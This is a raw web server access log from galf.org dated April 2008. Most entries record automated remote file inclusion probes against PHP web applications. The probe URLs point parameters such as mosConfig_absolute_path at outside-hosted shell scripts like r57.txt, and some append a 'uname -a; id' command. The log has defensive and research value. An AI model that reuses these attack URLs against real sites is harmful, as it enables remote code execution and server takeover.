200.11.67.242 - - [14/Apr/2008:07:50:47 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:50:47 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:50:47 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:51:03 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:51:04 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:51:04 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:51:06 -0700] "GET /logs/access_070903.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:51:24 -0700] "GET /logs/access_070903.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.118.97.248 - - [14/Apr/2008:07:51:26 -0700] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://www.lacomarcaatlantica.com.ar/includes/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.118.97.248 - - [14/Apr/2008:07:51:26 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.lacomarcaatlantica.com.ar/includes/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.118.97.248 - - [14/Apr/2008:07:51:26 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.lacomarcaatlantica.com.ar/includes/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.118.97.248 - - [14/Apr/2008:07:51:39 -0700] "GET /logs/access_080303.log//tools/send_reminders.php?noSet=0&includedir=http://www.lacomarcaatlantica.com.ar/includes/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.118.97.248 - - [14/Apr/2008:07:51:39 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.lacomarcaatlantica.com.ar/includes/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.118.97.248 - - [14/Apr/2008:07:51:39 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.lacomarcaatlantica.com.ar/includes/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
74.6.22.162 - - [14/Apr/2008:07:51:46 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.7.168 - - [14/Apr/2008:07:51:47 -0700] "GET /?D=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:51:47 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:51:48 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:51:48 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:51:53 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:51:54 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:51:54 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.118.97.248 - - [14/Apr/2008:07:52:28 -0700] "GET /logs/access_080107.log//tools/send_reminders.php?noSet=0&includedir=http://www.lacomarcaatlantica.com.ar/includes/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.118.97.248 - - [14/Apr/2008:07:52:35 -0700] "GET /logs/access_080107.log//tools/send_reminders.php?noSet=0&includedir=http://www.lacomarcaatlantica.com.ar/includes/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
61.47.60.169 - - [14/Apr/2008:07:53:41 -0700] "GET /logs/access_070820.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
61.47.60.169 - - [14/Apr/2008:07:53:42 -0700] "GET //index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
61.47.60.169 - - [14/Apr/2008:07:53:43 -0700] "GET /logs//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
130.15.26.30 - - [14/Apr/2008:07:55:18 -0700] "GET /logs/index2.php?x=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
130.15.26.30 - - [14/Apr/2008:07:55:19 -0700] "GET /index2.php?x=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
61.47.60.169 - - [14/Apr/2008:07:55:56 -0700] "GET /logs/access_070716.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
74.6.19.252 - - [14/Apr/2008:07:57:53 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.19.235 - - [14/Apr/2008:08:01:33 -0700] "GET /?N=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
147.102.106.10 - - [14/Apr/2008:08:01:35 -0700] "GET /logs/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://www.eenpotnat.com/modules/poll/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
193.178.145.180 - - [14/Apr/2008:08:04:07 -0700] "GET /logs/access_080324.log//index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.178.145.180 - - [14/Apr/2008:08:04:07 -0700] "GET /logs//index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.100.254.179 - - [14/Apr/2008:08:05:35 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://asyacan.info/tool20.dat?&cmd=uname%20-a;%20id HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.galf.org"
130.15.26.30 - - [14/Apr/2008:08:06:46 -0700] "GET /logs/index2.php?x=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
130.15.26.30 - - [14/Apr/2008:08:06:46 -0700] "GET /index2.php?x=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
130.15.26.30 - - [14/Apr/2008:08:06:48 -0700] "GET /logs/index2.php?x=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
65.182.191.76 - - [14/Apr/2008:08:06:48 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.emailnotices.com/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
154.11.13.142 - - [14/Apr/2008:08:06:50 -0700] "GET /index2.php?x=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
65.182.191.76 - - [14/Apr/2008:08:06:52 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.emailnotices.com/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
67.195.51.252 - - [14/Apr/2008:08:09:51 -0700] "GET /?N=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
80.68.203.22 - - [14/Apr/2008:08:10:06 -0700] "GET /logs/access_071008.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.68.203.22 - - [14/Apr/2008:08:10:06 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.68.203.22 - - [14/Apr/2008:08:10:06 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.63.191.212 - - [14/Apr/2008:08:10:22 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.jef.at/sp/vnc/r57.txt?? HTTP/1.1" 404 275 "-" "-" "www.galf.org"
74.6.8.28 - - [14/Apr/2008:08:10:28 -0700] "GET /logs/access_071001.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
147.102.106.10 - - [14/Apr/2008:08:11:16 -0700] "GET /logs/access_070709.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/renatas2/id21.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
147.102.106.10 - - [14/Apr/2008:08:11:27 -0700] "GET /logs/access_071008.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/renatas2/id21.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
66.235.216.127 - - [14/Apr/2008:08:13:23 -0700] "GET /index.php?x=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.20.5.22 - - [14/Apr/2008:08:13:28 -0700] "GET /logs/access_080114.log/homepage.php?sel=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.20.5.22 - - [14/Apr/2008:08:13:28 -0700] "GET /homepage.php?sel=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.20.5.22 - - [14/Apr/2008:08:13:28 -0700] "GET /logs/homepage.php?sel=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.20.5.22 - - [14/Apr/2008:08:13:48 -0700] "GET /logs/access_071210.log/main.php?x=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.20.5.22 - - [14/Apr/2008:08:13:48 -0700] "GET /main.php?x=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.20.5.22 - - [14/Apr/2008:08:13:48 -0700] "GET /logs/main.php?x=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.195.51.225 - - [14/Apr/2008:08:14:26 -0700] "GET /?S=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.20.5.22 - - [14/Apr/2008:08:14:29 -0700] "GET /logs/access.log/main.php?x=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.20.5.22 - - [14/Apr/2008:08:14:46 -0700] "GET /logs/access_080113.log/homepage.php?sel=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.195.51.154 - - [14/Apr/2008:08:16:25 -0700] "GET /?S=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.232.102.34 - - [14/Apr/2008:08:16:43 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
66.232.102.34 - - [14/Apr/2008:08:16:43 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
193.178.145.180 - - [14/Apr/2008:08:16:52 -0700] "GET /logs/access_071015.log//index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.105.35.14 - - [14/Apr/2008:08:17:02 -0700] "GET /logs/access.log/index.php?x=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.105.35.14 - - [14/Apr/2008:08:17:03 -0700] "GET /index.php?x=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.105.35.14 - - [14/Apr/2008:08:17:06 -0700] "GET /logs/index.php?x=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
24.172.171.18 - - [14/Apr/2008:08:17:44 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
24.172.171.18 - - [14/Apr/2008:08:17:52 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
216.246.30.195 - - [14/Apr/2008:08:18:10 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.i-promo.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.20.5.22 - - [14/Apr/2008:08:20:12 -0700] "GET /logs/access_071022.log/index1.php?x=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.20.5.22 - - [14/Apr/2008:08:20:12 -0700] "GET /index1.php?x=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.20.5.22 - - [14/Apr/2008:08:20:12 -0700] "GET /logs/index1.php?x=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.20.5.22 - - [14/Apr/2008:08:21:31 -0700] "GET /logs/access_070730.log/index2.php?x=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.20.5.22 - - [14/Apr/2008:08:21:31 -0700] "GET /index2.php?x=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.20.5.22 - - [14/Apr/2008:08:21:32 -0700] "GET /logs/index2.php?x=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.20.5.22 - - [14/Apr/2008:08:22:17 -0700] "GET /logs/access_070716.log/index2.php?x=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.51.146 - - [14/Apr/2008:08:23:16 -0700] "GET /logs/access_071015.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.51.146 - - [14/Apr/2008:08:23:16 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.51.146 - - [14/Apr/2008:08:23:16 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.51.146 - - [14/Apr/2008:08:23:18 -0700] "GET /logs/access_071015.log//modules/xt_conteudo/config/spaw_control.config.php?spaw_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.51.146 - - [14/Apr/2008:08:23:18 -0700] "GET //modules/xt_conteudo/config/spaw_control.config.php?spaw_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.51.146 - - [14/Apr/2008:08:23:18 -0700] "GET /logs//modules/xt_conteudo/config/spaw_control.config.php?spaw_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.51.146 - - [14/Apr/2008:08:23:18 -0700] "GET /logs/access_071014.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.51.146 - - [14/Apr/2008:08:23:18 -0700] "GET /logs/access_071015.log//modules/xt_conteudo/class/lang.class.php?spaw_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.51.146 - - [14/Apr/2008:08:23:18 -0700] "GET /logs/access_071015.log//modules/xt_conteudoc/lass/toolbars.class.php?spaw_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.51.146 - - [14/Apr/2008:08:23:19 -0700] "GET //modules/xt_conteudo/class/lang.class.php?spaw_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.51.146 - - [14/Apr/2008:08:23:19 -0700] "GET //modules/xt_conteudoc/lass/toolbars.class.php?spaw_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.51.146 - - [14/Apr/2008:08:23:19 -0700] "GET /logs//modules/xt_conteudo/class/lang.class.php?spaw_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.51.146 - - [14/Apr/2008:08:23:19 -0700] "GET /logs//modules/xt_conteudoc/lass/toolbars.class.php?spaw_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.51.146 - - [14/Apr/2008:08:23:21 -0700] "GET /logs/access_071014.log//modules/xt_conteudo/class/lang.class.php?spaw_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.51.146 - - [14/Apr/2008:08:23:21 -0700] "GET /logs/access_071014.log//modules/xt_conteudoc/lass/toolbars.class.php?spaw_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.51.146 - - [14/Apr/2008:08:23:24 -0700] "GET /logs/access_071014.log//modules/xt_conteudo/config/spaw_control.config.php?spaw_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.100.254.179 - - [14/Apr/2008:08:23:55 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://asyacan.info/tool20.dat?&cmd=uname%20-a;%20id HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.galf.org"
66.232.102.34 - - [14/Apr/2008:08:25:36 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
66.232.102.34 - - [14/Apr/2008:08:25:37 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
77.91.224.17 - - [14/Apr/2008:08:29:53 -0700] "GET /cendoc.php HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
200.105.35.14 - - [14/Apr/2008:08:30:39 -0700] "GET /logs/access_070716.log/index.php?x=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.68.203.22 - - [14/Apr/2008:08:33:43 -0700] "GET /logs/access_080113.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.68.203.22 - - [14/Apr/2008:08:33:43 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.68.203.22 - - [14/Apr/2008:08:33:44 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.105.35.14 - - [14/Apr/2008:08:36:41 -0700] "GET /logs/access_071119.log//faqsupport/samplefaqsupport.php?path[docroot]=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.105.35.14 - - [14/Apr/2008:08:36:43 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.105.35.14 - - [14/Apr/2008:08:36:44 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.185.237.143 - - [14/Apr/2008:08:40:26 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.backbreakacres.com/22/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
64.185.237.143 - - [14/Apr/2008:08:40:26 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.backbreakacres.com/22/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
74.86.204.20 - - [14/Apr/2008:08:40:30 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
74.86.204.20 - - [14/Apr/2008:08:40:30 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
77.221.130.16 - - [14/Apr/2008:08:40:30 -0700] "GET /logs/access.log/contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue02.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.16 - - [14/Apr/2008:08:40:30 -0700] "GET /contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue02.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.16 - - [14/Apr/2008:08:40:30 -0700] "GET /logs/contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue02.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.185.237.143 - - [14/Apr/2008:08:40:33 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.backbreakacres.com/22/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "galf.org"
64.185.237.143 - - [14/Apr/2008:08:40:33 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.backbreakacres.com/22/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "galf.org"
